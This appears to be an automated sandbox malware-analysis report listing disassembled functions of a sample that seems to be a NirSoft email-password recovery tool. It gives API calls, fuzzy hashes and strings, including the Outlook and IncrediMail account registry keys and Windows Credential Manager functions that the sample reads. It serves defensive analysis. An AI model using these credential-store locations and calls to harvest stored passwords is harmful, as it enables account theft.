                  • Opcode ID: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
                  • Instruction ID: 2d12b684a12309e3f166330e45fd276d2d431d1b057f0c9926c0b37ed6681b29
                  • Opcode Fuzzy Hash: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
                  • Instruction Fuzzy Hash: BE41B172604205DFD724DBA4C9C1F97B7E8AF08304F10467BE649E3281D778E955CB58
                  Function 0040CD80 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 122COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _stricmp_strnicmpmemsetsprintf
                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                  • API String ID: 2822975062-2229823034
                  • Opcode ID: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                  • Instruction ID: b4ee7e9bcea435462912fc28dba82f8fd87397000d83f7605d7513f68c800710
                  • Opcode Fuzzy Hash: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                  • Instruction Fuzzy Hash: 0C417E72604205EFD724DBA4C9C1F96B7E8AF18304F00467BE64AE3281D778F995CB98
                  Function 0040278F Relevance: 21.1, APIs: 3, Strings: 11, Instructions: 117stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00402837
                    • Part of subcall function 00402963: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 00402994
                  • strcpy.MSVCRT(?,?,76DBEB20,?,00000000), ref: 00402871
                    • Part of subcall function 00402963: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029C2
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,76DBEB20,?,00000000), ref: 0040293C
                    • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: QueryValuestrcpy$ByteCharMultiWidememset
                  • String ID: 8A$48A$<6A$Display Name$Email$H6A$SMTP Port$SMTP Server$d6A$t7A$7A
                  • API String ID: 1302727986-2717830028
                  • Opcode ID: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                  • Instruction ID: 308be4cc5b828d0a3e021f21c5187f9384b0cc6d4098b7245e54e25f5b72303c
                  • Opcode Fuzzy Hash: 832ecfa302c2265efd1f56203e1d837ddfbcb2d0fb3c2068bcbc5ca0dd018d8a
                  • Instruction Fuzzy Hash: D9410BB150024DABCF21EF61DD499DD7BA9FF04309F10816BF92466291D3B99A89CF48
                  Function 0040820D Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                  Download Yara Rule
                  APIs
                  • sprintf.MSVCRT ref: 0040822E
                  • LoadMenuA.USER32(?,?), ref: 0040823C
                    • Part of subcall function 00408065: GetMenuItemCount.USER32(?), ref: 0040807A
                    • Part of subcall function 00408065: memset.MSVCRT ref: 0040809B
                    • Part of subcall function 00408065: GetMenuItemInfoA.USER32 ref: 004080D6
                    • Part of subcall function 00408065: strchr.MSVCRT ref: 004080ED
                  • DestroyMenu.USER32(00000000), ref: 0040825A
                  • sprintf.MSVCRT ref: 0040829E
                  • CreateDialogParamA.USER32(?,00000000,00000000,00408208,00000000), ref: 004082B3
                  • memset.MSVCRT ref: 004082CF
                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 004082E0
                  • EnumChildWindows.USER32(00000000,Function_00008155,00000000), ref: 00408308
                  • DestroyWindow.USER32(00000000), ref: 0040830F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                  • String ID: caption$dialog_%d$menu_%d
                  • API String ID: 3259144588-3822380221
                  • Opcode ID: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
                  • Instruction ID: bbac317cb8ff6209085768228bd9594f53373bc5c39c5be55c638663b0a3ff3e
                  • Opcode Fuzzy Hash: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
                  • Instruction Fuzzy Hash: 33210532540148BFDF12AF60DD45EEF3B68EB55706F0440BEFA41A1190DBB99E948B2D
                  Function 004083E4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 69stringCOMMON
                  Download Yara Rule
                  APIs
                  • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 004083FC
                  • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 0040840C
                    • Part of subcall function 00407FBF: memset.MSVCRT ref: 00407FE4
                    • Part of subcall function 00407FBF: GetPrivateProfileStringA.KERNEL32(004182C0,00000104,0041344F,?,00001000,004181B8), ref: 00408008
                    • Part of subcall function 00407FBF: WritePrivateProfileStringA.KERNEL32(004182C0,?,?,004181B8), ref: 0040801F
                  • EnumResourceNamesA.KERNEL32(00000104,00000004,0040820D,00000000), ref: 00408442
                  • EnumResourceNamesA.KERNEL32(00000104,00000005,0040820D,00000000), ref: 0040844C
                  • strcpy.MSVCRT(004182C0,strings,?,00408515,00000000,?,00000000,00000104,?), ref: 00408454
                  • memset.MSVCRT ref: 00408470
                  • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 00408484
                    • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                  • String ID: O4A$TranslatorName$TranslatorURL$general$strings
                  • API String ID: 1060401815-2553245061
                  • Opcode ID: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                  • Instruction ID: 8ec8ecd25de3f69567fa6951aee80203735b19b36847dd402765e4c6546554b2
                  • Opcode Fuzzy Hash: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                  • Instruction Fuzzy Hash: 201108319401543AD73167569D0AFDB3E6CDB85B94F1040BFBA48A61C1D9BC59C086BC
                  Function 0040E6C7 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E377), ref: 0040E6D6
                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E6EF
                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E700
                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E711
                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E722
                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E733
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                  • API String ID: 667068680-3953557276
                  • Opcode ID: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
                  • Instruction ID: 5b748ad6718b7057422386d5a916c05b319ca6e7afffd602bf2aa3a230b78167
                  • Opcode Fuzzy Hash: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
                  • Instruction Fuzzy Hash: E6F086B0AC5306A9E750CB26AD84FAB2DF85B85B81719403BF404F22D4DB7884428B6D
                  Function 00404651 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004046CC: FreeLibrary.KERNEL32(?,00404659,?,0040DC5F,80000001,76DBEC10), ref: 004046D3
                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,76DBEC10), ref: 0040465E
                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                  • GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                  • API String ID: 2449869053-4258758744
                  • Opcode ID: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
                  • Instruction ID: ff9940379d8f3ddc00738bb66027861fd390550b24bba25458702abe812256fc
                  • Opcode Fuzzy Hash: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
                  • Instruction Fuzzy Hash: 1F012CB0A447019ACB30AF75C809B56BAF4AF94705B218D2EE1C5A36A0E77E9181CF58
                  Function 004116BE Relevance: 19.7, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004116E3
                    • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                  • strlen.MSVCRT ref: 004116FF
                  • memset.MSVCRT ref: 00411739
                  • memset.MSVCRT ref: 0041174D
                  • memset.MSVCRT ref: 00411761
                  • memset.MSVCRT ref: 00411787
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                    • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                  • memcpy.MSVCRT ref: 004117BE
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                  • memcpy.MSVCRT ref: 004117FA
                  • memcpy.MSVCRT ref: 0041180C
                  • strcpy.MSVCRT(?,?), ref: 004118E3
                  • memcpy.MSVCRT ref: 00411914
                  • memcpy.MSVCRT ref: 00411926
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpymemset$strlen$strcpy
                  • String ID: salu
                  • API String ID: 2660478486-4177317985
                  • Opcode ID: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                  • Instruction ID: f1a42822f8ef7e9ef4ab6207fa972415b32dae4f069819a41f3cbfc12677ad8b
                  • Opcode Fuzzy Hash: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                  • Instruction Fuzzy Hash: 84717E7290011DAACB10EB95CC81ADE77BDFF08348F1445BAF648E7151DB749B888F98
                  Function 00404292 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                  Download Yara Rule
                  APIs
                  • wcsstr.MSVCRT ref: 004042C7
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 0040430E
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404322
                  • strcpy.MSVCRT(?,?), ref: 00404332
                  • strcpy.MSVCRT(?,?,?,?), ref: 00404345
                  • strchr.MSVCRT ref: 00404353
                  • strlen.MSVCRT ref: 00404367
                  • sprintf.MSVCRT ref: 00404388
                  • strchr.MSVCRT ref: 00404399
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                  • String ID: %s@gmail.com$www.google.com
                  • API String ID: 1359934567-4070641962
                  • Opcode ID: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                  • Instruction ID: 1c9d9e350e6bfb7db098629835421676e34b4d03cf30903a353d84187424ac51
                  • Opcode Fuzzy Hash: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                  • Instruction Fuzzy Hash: AE3166B2904219AFDB11DB91DD81FDBB7ACAB14314F1001A7B708E2180D678AF958A98
                  Function 00403E97 Relevance: 18.1, APIs: 7, Strings: 5, Instructions: 98stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  • memset.MSVCRT ref: 00403ECF
                  • memset.MSVCRT ref: 00403EE3
                  • memset.MSVCRT ref: 00403EF7
                  • sprintf.MSVCRT ref: 00403F18
                  • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F34
                  • sprintf.MSVCRT ref: 00403F6B
                  • sprintf.MSVCRT ref: 00403F9C
                  Strings
                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA7
                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F46
                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F12
                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F96
                  • <table dir="rtl"><tr><td>, xrefs: 00403F2E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memsetsprintf$FileWritestrcpystrlen
                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                  • API String ID: 1043021993-1670831295
                  • Opcode ID: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                  • Instruction ID: 99203b830fad9dc7343b4b85adec4cad5e30f503418e1d4ebc977d79dce285bf
                  • Opcode Fuzzy Hash: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                  • Instruction Fuzzy Hash: F13166B2D00119AEDB54EB95DC41EDF7BACEB08304F1441ABB608E3141DA786FD48B69
                  Function 00402C1E Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00402C5E
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • RegCloseKey.ADVAPI32(?), ref: 00402D60
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • memset.MSVCRT ref: 00402CB8
                  • sprintf.MSVCRT ref: 00402CD1
                  • sprintf.MSVCRT ref: 00402D0F
                    • Part of subcall function 00402B92: memset.MSVCRT ref: 00402BB2
                    • Part of subcall function 00402B92: RegCloseKey.ADVAPI32 ref: 00402C16
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Closememset$sprintf$EnumOpen
                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                  • API String ID: 1831126014-3814494228
                  • Opcode ID: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                  • Instruction ID: 6132c75c80fc905e8fcbbac6237d45e27d646b3e48d82405447337ab985425ff
                  • Opcode Fuzzy Hash: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                  • Instruction Fuzzy Hash: 66314072D0011DBADB21EA91CD42EEF7B7CAF18345F0404BABA14F2091E7B49F888B54
                  Function 0040F44C Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                  Download Yara Rule
                  APIs
                  • strcpy.MSVCRT(?,Common Programs,0040F56A,?,?,?,?,?,00000104), ref: 0040F4BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy
                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                  • API String ID: 3177657795-318151290
                  • Opcode ID: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                  • Instruction ID: 3fcc29bccd1c625ad2997487a879199120d1d943b4c0761a6650e27991626466
                  • Opcode Fuzzy Hash: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                  • Instruction Fuzzy Hash: B9F01D732BEE0A60D43405681F06EF70402A0F17553BA86336D42F5ED6E9BC888E60AF
                  Function 00402F9C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00402FDF
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • memset.MSVCRT ref: 0040302C
                  • sprintf.MSVCRT ref: 00403044
                  • memset.MSVCRT ref: 00403075
                  • RegCloseKey.ADVAPI32(?), ref: 004030BD
                  • RegCloseKey.ADVAPI32(?), ref: 004030E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$Close$EnumOpensprintf
                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                  • API String ID: 3672803090-3168940695
                  • Opcode ID: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                  • Instruction ID: 768b3681e431995c61ece500f3f0ca2292d3b8ebaed2eb0df27a6a0be2325633
                  • Opcode Fuzzy Hash: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                  • Instruction Fuzzy Hash: 27316FB680020DBFDB21EB51CC81EEE7B7CAF14344F0041B6B908A1151E7799F989F65
                  Function 00407BCE Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                  • String ID: 0$6
                  • API String ID: 1757351179-3849865405
                  • Opcode ID: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                  • Instruction ID: b54eda8ed3125ae11668051ec90bd02c66b6cc1d7fa6bc8d4742b266666783d1
                  • Opcode Fuzzy Hash: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                  • Instruction Fuzzy Hash: 01319E7280C384AFD7209F55D84099BBBE9FF88354F14893EF59492250D379EA44CB6B
                  Function 0040EFF9 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                  Download Yara Rule
                  APIs
                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F02A
                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                  • memcpy.MSVCRT ref: 0040F075
                  • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                  Strings
                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F01E
                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040F032
                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F025
                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F011
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
